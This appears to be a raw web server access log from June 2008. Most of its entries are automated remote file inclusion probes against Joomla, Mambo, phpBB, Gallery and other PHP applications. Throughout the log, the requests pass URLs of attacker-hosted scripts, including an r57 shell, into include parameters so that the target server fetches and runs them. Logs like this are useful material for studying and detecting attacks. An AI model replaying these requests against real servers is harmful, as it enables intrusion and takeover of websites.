222.237.78.125 - - [24/Jun/2008:11:51:15 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:51:19 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:51:20 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [24/Jun/2008:11:51:39 -0700] "GET /errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [24/Jun/2008:11:51:53 -0700] "GET /logs/access_080312.log//init_basic.php?GALLERY_BASEDIR=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [24/Jun/2008:11:51:59 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [24/Jun/2008:11:51:59 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:11:52:00 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:11:52:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:11:52:00 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:52:08 -0700] "GET /logs//includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:52:08 -0700] "GET //includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:52:08 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:52:26 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:52:26 -0700] "GET /logs//includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:52:27 -0700] "GET //includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:52:42 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:52:45 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18559 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:52:46 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:52:58 -0700] "GET /logs/access_080220.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:52:59 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:11:53:04 -0700] "GET /logs/access_080220.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:11:53:04 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:53:08 -0700] "GET /logs/access_080220.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:53:08 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:53:08 -0700] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:53:16 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.31 - - [24/Jun/2008:11:53:18 -0700] "GET /megumi/minamigrad2k8/?N=D HTTP/1.1" 200 25468 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:11:53:21 -0700] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.98.70.18 - - [24/Jun/2008:11:53:32 -0700] "GET /logs/access_080211.log/index.php?nuseo_dir=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:53:35 -0700] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:53:48 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:53:48 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:54:01 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:54:08 -0700] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.243 - - [24/Jun/2008:11:54:12 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:54:23 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:54:26 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18541 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:54:49 -0700] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:54:49 -0700] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:54:49 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:54:49 -0700] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:54:58 -0700] "GET /logs/access_080507.log/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:54:59 -0700] "GET /main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:54:59 -0700] "GET /logs/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:55:29 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:55:32 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:55:33 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:55:35 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:55:37 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18543 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:55:38 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:55:51 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:55:51 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:56:09 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:56:09 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:56:09 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:56:14 -0700] "GET /logs/access_080304.log/main.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:56:23 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:56:43 -0700] "GET /logs/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:56:43 -0700] "GET /errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:56:46 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:56:50 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18541 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:56:53 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:57:42 -0700] "GET /logs//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:57:43 -0700] "GET //includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.146.38 - - [24/Jun/2008:11:57:45 -0700] "GET //includes/messages.inc.php?include_path=http://alternate-zone.com/logs/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [24/Jun/2008:11:57:45 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://alternate-zone.com/logs/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [24/Jun/2008:11:57:45 -0700] "GET /logs//includes/messages.inc.php?include_path=http://alternate-zone.com/logs/n.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:57:47 -0700] "GET /logs/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:11:57:48 -0700] "GET /errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:58:25 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:58:31 -0700] "GET /logs//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:58:31 -0700] "GET //includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:11:58:34 -0700] "GET /logs/access.log/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:11:58:40 -0700] "GET /logs/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:11:58:40 -0700] "GET /index.php?url=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 200 18383 "-" "libwww-perl/5.805" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:58:50 -0700] "GET /logs/access_080312.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:59:05 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:11:59:50 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:11:59:50 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:11:59:51 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:00:16 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:00:16 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:00:24 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:00:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.228.221 - - [24/Jun/2008:12:00:31 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.228.221 - - [24/Jun/2008:12:00:31 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.228.221 - - [24/Jun/2008:12:00:32 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:00:34 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:12:00:38 -0700] "GET /logs/access_071223.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.251.172 - - [24/Jun/2008:12:00:45 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:12:01:00 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:12:01:01 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:12:01:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:12:01:08 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:12:01:09 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:01:14 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:01:15 -0700] "GET /logs/access_080108.log//include/write.php?dir=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:01:15 -0700] "GET //include/write.php?dir=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:01:16 -0700] "GET /logs//include/write.php?dir=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:01:16 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18547 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:01:17 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:12:01:29 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:35 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:35 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:35 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:01:39 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:01:39 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:01:40 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:40 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
